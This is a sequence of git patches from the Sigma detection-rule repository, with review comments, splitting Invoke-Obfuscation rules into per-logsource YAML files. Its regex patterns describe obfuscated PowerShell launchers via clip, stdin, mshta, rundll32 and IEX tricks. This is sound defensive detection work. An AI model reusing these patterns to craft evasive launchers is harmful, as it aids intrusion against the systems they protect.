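Review bot: `modified: 2019/09/20` predates `date: 2021/09/20` by two years for a file created in this commit — almost certainly a typo for `2021/09/20`, and `modified` is normally omitted on first commit anyway. `status: stable` on a brand-new rule also departs from the convention in this series, where new rules start as `status: experimental` until they have run somewhere; placing it after `fields` rather than next to `id` makes it easy to miss as well. The detection itself (`uri: /wsman`, `method: POST`, `status_code: 200`, no `AUTHORIZATION` header, non-empty body) reads correctly for CVE-2021-38647; note that Zeek's http.log `uri` includes any query string, so `uri|startswith: /wsman` would be safer than the exact match if a client appends one.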
From: frack113 Date: Mon, 20 Sep 2021 22:40:33 +0200 Subject: [PATCH 0996/1367] split global win_invoke_obfuscation_* --- .../win_invoke_obfuscation_clip+_services.yml | 35 ++++------------- ...ke_obfuscation_obfuscated_iex_services.yml | 38 +++++-------------- ...win_invoke_obfuscation_stdin+_services.yml | 35 ++++------------- .../win_invoke_obfuscation_var+_services.yml | 32 ++++------------ ...voke_obfuscation_via_compress_services.yml | 27 ++----------- ...invoke_obfuscation_via_rundll_services.yml | 35 ++++------------- ..._invoke_obfuscation_via_stdin_services.yml | 35 ++++------------- ...voke_obfuscation_via_use_clip_services.yml | 35 ++++------------- ...oke_obfuscation_via_use_mshta_services.yml | 35 ++++------------- ..._obfuscation_via_use_rundll32_services.yml | 35 ++++------------- ..._invoke_obfuscation_via_var++_services.yml | 35 ++++------------- 11 files changed, 86 insertions(+), 291 deletions(-) diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml index 6ba0e08f..c71bb902 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation CLIP+ Launcher +id: f7385ee2-0e0c-11eb-adc1-0242ac120002 description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 -modified: 2021/08/14 +modified: 2021/09/16 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: 
@@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' - condition: selection and selection_eventid ---- -id: f7385ee2-0e0c-11eb-adc1-0242ac120002 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3 -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 4edf51e1-cb83-4e1a-bc39-800e396068e3 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml index 077f3e5c..4a0dbf7e 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services.yml 
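Review bot: The rewritten rule now ends with `\ No newline at end of file` after `level: high`, whereas the original ended with a line break; the same happens in the hunks for obfuscated_iex, stdin+, var+, via_compress, via_rundll, via_stdin, via_use_clip, via_use_mshta, via_use_rundll32 and via_var++. A trailing newline keeps YAML linters and future diffs clean, so the last line should be `level: high` followed by a line break. The `modified` value `2021/09/16` here differs from `2021/09/17` and `2021/09/18` in sibling files touched by the same commit, presumably reflecting when each file was edited; one date for the whole split would make the history easier to read.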
@@ -1,16 +1,19 @@ -action: global title: Invoke-Obfuscation Obfuscated IEX Invocation +id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 +modified: 2021/09/16 tags: - attack.defense_evasion - attack.t1027 -falsepositives: - - Unknown -level: high +logsource: + product: windows + service: system detection: + selection: + EventID: 7045 selection_1: - ImagePath|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' @@ -20,27 +23,6 @@ detection: - ImagePath|re: '\$VerbosePreference\.ToString\(' - ImagePath|re: '\String\]\s*\$VerbosePreference' condition: selection and selection_1 ---- -id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 -logsource: - product: windows - service: system -detection: - selection: - EventID: 7045 ---- -id: e75c48bd-3434-4d61-94b7-ddfaa2c08487 -logsource: - product: windows - category: driver_load -detection: - selection: - EventID: 6 ---- -id: fd0f5778-d3cb-4c9a-9695-66759d04702a -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml index 0bebb79d..1df94234 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml 
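Review bot: The selection names in this file's new `detection` block (`selection` for the EventID, `selection_1` for the regex list) are the reverse of the convention the sibling files adopt (`selection_eventid` for the EventID, `selection` for the `ImagePath|re` match), so a reader comparing the split rules has to re-read the condition. Renaming them to `selection_eventid:` and `selection:` with `condition: selection and selection_eventid` would make the eleven rules uniform. The description string embeds `\u2014`; a plain dash would avoid the escape without changing meaning.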
@@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation STDIN+ Launcher +id: 72862bf2-0eb1-11eb-adc1-0242ac120002 description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/08/09 +modified: 2021/09/17 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) tags: @@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' - condition: selection and selection_eventid ---- -id: 72862bf2-0eb1-11eb-adc1-0242ac120002 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml index 939ff725..c94706f0 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services.yml 
@@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation VAR+ Launcher +id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 description: Detects Obfuscated use of Environment Variables to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/15 -modified: 2021/08/09 +modified: 2021/09/17 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) tags: @@ -12,31 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' - condition: all of them ---- -id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc -logsource: - product: windows - category: process_creation ---- -id: dcf2db1f-f091-425b-a821-c05875b8925a -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + condition: all of them +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml index 1b1b490f..04f8fbb6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services.yml @@ -1,5 +1,5 @@ -action: global title: Invoke-Obfuscation COMPRESS OBFUSCATION +id: 175997c5-803c-4b08-8bb0-70b099f47595 description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community 
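Review bot: The var+ split deletes the `process_creation` variant with id `3e27b010-2cf2-4577-8ef0-3ea44aaea0dc` outright, while the `driver_load` and `security` variants of the other rules are carried into new files with a `related` entry. If the project keeps a record of retired rule ids (a deprecated folder or changelog), that id should be recorded there so deployments referencing it can map the change. Dropping it is probably intentional, since that variant had no detection override and `ImagePath` is presumably not a process_creation field, but stating that in the commit message would save the next reader from guessing.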
@@ -15,31 +15,12 @@ tags: falsepositives: - unknown level: medium -detection: - selection: - ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' - condition: selection and selection_eventid ---- -id: 175997c5-803c-4b08-8bb0-70b099f47595 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: c70731dd-0097-40ff-b112-f7032f29c16c -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 7a922f1b-2635-4d6c-91ef-af228b198ad3 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + condition: selection and selection_eventid \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml index 11317dda..2855fa00 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation RUNDLL LAUNCHER +id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 description: Detects Obfuscated Powershell via RUNDLL LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) tags: 
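Review bot: The compress rule's `modified` field is not advanced in this commit: the two hunks cover lines 1–5 and 15–45, a change on lines 6–14 would have shown as a changed line, and yet the derived driver_load copy added in the following commit records `modified: 2021/09/18`. Every sibling rule touched by the same split advances `modified`, so this file should get `modified: 2021/09/18` as well (if it never had the field, adding it is still worthwhile). The `falsepositives` entry `unknown` is lowercase while the other files use `Unknown`; harmless, but worth aligning while the file is being rewritten.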
@@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: medium -detection: - selection: - ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' - condition: selection and selection_eventid ---- -id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml index 4cc9ee79..f6a21dff 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation Via Stdin +id: 487c7524-f892-4054-b263-8a0ace63fc25 description: Detects Obfuscated Powershell via Stdin in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/12 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) tags: 
@@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' - condition: selection and selection_eventid ---- -id: 487c7524-f892-4054-b263-8a0ace63fc25 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 82b66143-53ee-4369-ab02-de2c70cd6352 -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml index 45b5d47b..a569fc7a 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation Via Use Clip +id: 63e3365d-4824-42d8-8b82-e56810fefa0c description: Detects Obfuscated Powershell via use Clip.exe in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) tags: 
@@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' - condition: selection and selection_eventid ---- -id: 63e3365d-4824-42d8-8b82-e56810fefa0c logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851 -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml index decfefb6..71b54142 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation Via Use MSHTA +id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: 
@@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' - condition: selection and selection_eventid ---- -id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: a4e82ad2-7430-4ee8-b858-6ad6099773fa -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml index a095343e..75b42d48 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation Via Use Rundll32 +id: 641a4bfb-c017-44f7-800c-2aee0184ce9b description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task30) tags: 
@@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' - condition: selection and selection_eventid ---- -id: 641a4bfb-c017-44f7-800c-2aee0184ce9b logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 4e1518d9-2136-4015-ab49-c31d7c8588e1 -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: cd0f7229-d16f-42de-8fe3-fba365fbcb3a -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml index af6859b6..7d8bc8d1 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml @@ -1,10 +1,10 @@ -action: global title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION +id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 -modified: 2021/08/09 +modified: 2021/09/18 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: 
@@ -12,34 +12,15 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 -falsepositives: - - Unknown -level: high -detection: - selection: - ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r - condition: selection and selection_eventid ---- -id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 logsource: product: windows service: system detection: selection_eventid: EventID: 7045 ---- -id: 7b9a650e-6788-4fdf-888d-ec7c0a62810d -logsource: - product: windows - category: driver_load -detection: - selection_eventid: - EventID: 6 ---- -id: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30 -logsource: - product: windows - service: security -detection: - selection_eventid: - EventID: 4697 + selection: + ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file From b6dc4de5e1b2e1167d4ddb20ba9f5b83680915db Mon Sep 17 00:00:00 2001 
From: frack113 Date: Mon, 20 Sep 2021 22:42:59 +0200 Subject: [PATCH 0997/1367] split global win_invoke_obfuscation_* --- ...load_invoke_obfuscation_clip+_services.yml | 27 ++++++++++++++++ ...ke_obfuscation_obfuscated_iex_services.yml | 29 +++++++++++++++++ ...oad_invoke_obfuscation_stdin+_services.yml | 27 ++++++++++++++++ ...voke_obfuscation_via_compress_services.yml | 28 +++++++++++++++++ ...invoke_obfuscation_via_rundll_services.yml | 27 ++++++++++++++++ ..._invoke_obfuscation_via_stdin_services.yml | 27 ++++++++++++++++ ...voke_obfuscation_via_use_clip_services.yml | 27 ++++++++++++++++ ...oke_obfuscation_via_use_mshta_services.yml | 27 ++++++++++++++++ ..._obfuscation_via_use_rundll32_services.yml | 27 ++++++++++++++++ ..._invoke_obfuscation_via_var++_services.yml | 27 ++++++++++++++++ ...ke_obfuscation_clip+_services_security.yml | 30 ++++++++++++++++++ ...ation_obfuscated_iex_services_security.yml | 31 +++++++++++++++++++ ...e_obfuscation_stdin+_services_security.yml | 29 +++++++++++++++++ ...oke_obfuscation_var+_services_security.yml | 30 ++++++++++++++++++ ...scation_via_compress_services_security.yml | 29 +++++++++++++++++ ...fuscation_via_rundll_services_security.yml | 29 +++++++++++++++++ ...bfuscation_via_stdin_services_security.yml | 29 +++++++++++++++++ ...scation_via_use_clip_services_security.yml | 31 +++++++++++++++++++ ...cation_via_use_mshta_services_security.yml | 29 +++++++++++++++++ ...ion_via_use_rundll32_services_security.yml | 29 +++++++++++++++++ ...bfuscation_via_var++_services_security.yml | 29 +++++++++++++++++ 21 files changed, 598 insertions(+) create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml create mode 100644 
rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_via_var++_services.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml create mode 100644 rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml diff --git a/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml new file mode 100644 index 00000000..8d2dea05 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml 
@@ -0,0 +1,27 @@ +title: Invoke-Obfuscation CLIP+ Launcher +id: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3 +related: + - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 + type: derived +description: Detects Obfuscated use of Clip.exe to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/13 +modified: 2021/09/16 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml new file mode 100644 index 00000000..98fcddc6 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml 
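Review bot: The driver_load variant keeps `ImagePath|re` under `category: driver_load`, but that category (the original global rule bound it to `EventID: 6`, i.e. Sysmon driver load) describes a loaded driver image and, to my knowledge, exposes `ImageLoaded` rather than `ImagePath`, so the launcher regex cannot match unless a backend field mapping rewrites the name. Since the file is placed under `rules-unsupported/`, a short clause in `description` stating why it is unsupported (e.g. `description: Detects Obfuscated use of Clip.exe to execute PowerShell. Driver load events carry no service command line; kept for reference only.`) would keep the next reader from re-deriving that. The same applies to the driver_load copies for obfuscated_iex, stdin+, via_compress, via_rundll, via_stdin, via_use_clip, via_use_mshta, via_use_rundll32 and via_var++.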
@@ -0,0 +1,29 @@ +title: Invoke-Obfuscation Obfuscated IEX Invocation +id: e75c48bd-3434-4d61-94b7-ddfaa2c08487 +related: + - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 + type: derived +description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" +status: experimental +author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community +date: 2019/11/08 +modified: 2021/09/16 +tags: + - attack.defense_evasion + - attack.t1027 +logsource: + product: windows + category: driver_load +detection: + selection: + - ImagePath|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' + - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' + - ImagePath|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' + - ImagePath|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' + - ImagePath|re: '\\*mdr\*\W\s*\)\.Name' + - ImagePath|re: '\$VerbosePreference\.ToString\(' + - ImagePath|re: '\String\]\s*\$VerbosePreference' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml new file mode 100644 index 00000000..1d7b40b0 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml 
@@ -0,0 +1,27 @@ +title: Invoke-Obfuscation STDIN+ Launcher +id: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e +related: + - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 + type: derived +description: Detects Obfuscated use of stdin to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/15 +modified: 2021/09/17 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 25) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml new file mode 100644 index 00000000..5b5b569c --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml @@ -0,0 +1,28 @@ +title: Invoke-Obfuscation COMPRESS OBFUSCATION +id: c70731dd-0097-40ff-b112-f7032f29c16c +related: + - id: 175997c5-803c-4b08-8bb0-70b099f47595 + type: derived +description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/18 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + + selection: + ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + condition: selection +falsepositives: + - unknown +level: medium \ No newline at end of file 
